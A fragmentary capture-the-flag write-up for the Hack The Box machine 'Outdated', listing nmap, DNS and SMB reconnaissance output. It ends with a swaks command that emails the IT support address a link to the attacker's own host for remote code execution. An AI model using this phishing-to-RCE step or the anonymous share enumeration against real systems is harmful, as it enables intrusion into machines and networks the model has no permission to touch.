Outdated
MediumMachineMar 13, 2026
#nmap#dig#fierce#smbclient#swaks#metaspolit
Tools
nmap
Command: nmap -sC -sV -oN init-full outdated.htb
# Nmap 7.92 scan initiated Sat Aug 13 14:02:56 2022 as: nmap -Pn -sC -sV -oN init-nmap.out outdated.htb
Nmap scan report for outdated.htb (10.129.188.41)
Host is up (0.053s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-14 07:03:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after: 2024-06-18T06:00:24
|_ssl-date: 2022-08-14T07:04:38+00:00; +12h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-14T07:04:38+00:00; +12h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after: 2024-06-18T06:00:24
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-14T07:04:39+00:00; +12h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after: 2024-06-18T06:00:24
3269/tcp open globalcatLDAPssl?
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after: 2024-06-18T06:00:24
|_ssl-date: 2022-08-14T07:04:38+00:00; +12h00m00s from scanner time.
Service Info: Hosts: mail.outdated.htb, DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 11h59m59s, deviation: 0s, median: 11h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 13 14:04:39 2022 -- 1 IP address (1 host up) scanned in 103.45 seconds
dig
Command: dig @10.129.188.41 outdated.htb
Docker container, custom ip = 172.16.20.1
╼parsec$dig @10.129.188.41 outdated.htb
; <<>> DiG 9.16.27-Debian <<>> @10.129.188.41 outdated.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 13223
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;outdated.htb. IN A
;; ANSWER SECTION:
outdated.htb. 600 IN A 172.16.20.1
outdated.htb. 600 IN A 10.129.188.41
;; Query time: 53 msec
;; SERVER: 10.129.188.41#53(10.129.188.41)
;; WHEN: Sat Aug 13 14:12:01 CDT 2022
;; MSG SIZE rcvd: 73
fierce
Command: fierce --domain outdated.htb --dns-servers 10.129.188.41
Found 3 subdomains, 2 configured in docker
└╼parsec$fierce --domain outdated.htb --dns-servers 10.129.188.41
NS: dc.outdated.htb.
SOA: dc.outdated.htb. (10.129.188.41)
Zone: failure
Wildcard: failure
Found: client.outdated.htb. (172.16.20.20)
Found: dc.outdated.htb. (172.16.20.1)
Found: mail.outdated.htb. (10.129.188.41)
smbclient
Command: smbclient -U '' -L //outdated.htb
Result: List available shares to anonymous session
Command: smbclient --no-pass //outdated.htb/Shares
Result: Connected to share and was able to download file
Finding this in the public Share folder we know what they're trying to patch
swaks
SMTP Hijacking
perl swaks.pl --to itsupport@outdated.htb --from me@example.com --server mail.outdated.htb --body "http://10.10.14.73/rce"
successfully gets us a clicked message
metaspolit
Found helpful msf article https://medium.com/hacker-toolbelt/metasploitable-2-i-lab-setup-8cd4472d7958